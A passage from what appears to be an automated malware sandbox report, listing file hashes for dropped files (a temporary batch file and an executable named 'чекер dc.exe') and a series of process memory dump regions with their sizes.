              MD5

              8cc1e7cf94fec9bc505ce7411aa28861

              SHA1

              08703de84f3db427c368f16c873664d78bd83264

              SHA256

              cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba

              SHA512

              fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

            • C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat

              Filesize

              196B

              MD5

              4edf0f350e0cf1ee2376797e9b78ab70

              SHA1

              1277e43b1e4c70263b1ad6f038e7e22be4e6472c

              SHA256

              c34c9688c023666946deed786e850650c5be956b3972a4c64be9a410e43d708f

              SHA512

              24e9f03afed93ace3ec67511afade0bb71ae1b40e26435a1ba3b84fbba776447e22208119f3a732c1530259d7d7fe952088dd0d296cc851ee64908452f517a66

            • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

              Filesize

              2.6MB

              MD5

              6216b6bef94c09a40bfa263809b1ae56

              SHA1

              a928120e65199c6aaae6c991aa0466f3f8b06020

              SHA256

              eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b

              SHA512

              0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

            • memory/468-138-0x0000014E6E870000-0x0000014E6E892000-memory.dmp

              Filesize

              136KB

            • memory/624-238-0x000000001C530000-0x000000001C53C000-memory.dmp

              Filesize

              48KB

            • memory/624-236-0x000000001C510000-0x000000001C518000-memory.dmp

              Filesize

              32KB

            • memory/624-234-0x000000001C3E0000-0x000000001C3EA000-memory.dmp

              Filesize

              40KB

            • memory/624-235-0x000000001C3F0000-0x000000001C3FE000-memory.dmp

              Filesize

              56KB

            • memory/624-237-0x000000001C520000-0x000000001C52A000-memory.dmp

              Filesize

              40KB

            • memory/624-233-0x000000001C400000-0x000000001C408000-memory.dmp

              Filesize

              32KB

            • memory/624-231-0x00000000032C0000-0x00000000032CC000-memory.dmp

              Filesize

              48KB

            • memory/624-232-0x000000001C2D0000-0x000000001C2DC000-memory.dmp

              Filesize

              48KB

            • memory/624-225-0x0000000000EC0000-0x000000000110A000-memory.dmp

              Filesize

              2.3MB

            • memory/624-227-0x0000000001950000-0x0000000001958000-memory.dmp

              Filesize

              32KB

            • memory/624-226-0x00000000018E0000-0x00000000018E8000-memory.dmp

              Filesize

              32KB

            • memory/624-228-0x0000000001960000-0x0000000001970000-memory.dmp

              Filesize

              64KB

            • memory/624-229-0x0000000003270000-0x00000000032C6000-memory.dmp

              Filesize

              344KB

            • memory/624-230-0x0000000001970000-0x000000000197C000-memory.dmp

              Filesize

              48KB

            • memory/2808-127-0x00007FF68D870000-0x00007FF68D89A000-memory.dmp

              Filesize

              168KB

            • memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp

              Filesize

              4.3MB

            • memory/4440-165-0x0000024240820000-0x000002424083E000-memory.dmp

              Filesize

              120KB

            • memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp

              Filesize

              256KB

            • memory/4440-220-0x00007FFE3E230000-0x00007FFE3ECF1000-memory.dmp

              Filesize

              10.8MB

            • memory/4440-126-0x00007FFE3E230000-0x00007FFE3ECF1000-memory.dmp

              Filesize

              10.8MB

            • memory/4440-202-0x00000242592B0000-0x00000242592C2000-memory.dmp

              Filesize

              72KB

            • memory/4440-201-0x0000024259170000-0x000002425917A000-memory.dmp

              Filesize

              40KB

            • memory/4440-164-0x00000242593B0000-0x0000024259400000-memory.dmp

              Filesize

              320KB

            • memory/4440-62-0x00007FFE3E233000-0x00007FFE3E235000-memory.dmp

              Filesize

              8KB

            • memory/4440-163-0x0000024259330000-0x00000242593A6000-memory.dmp

              Filesize

              472KB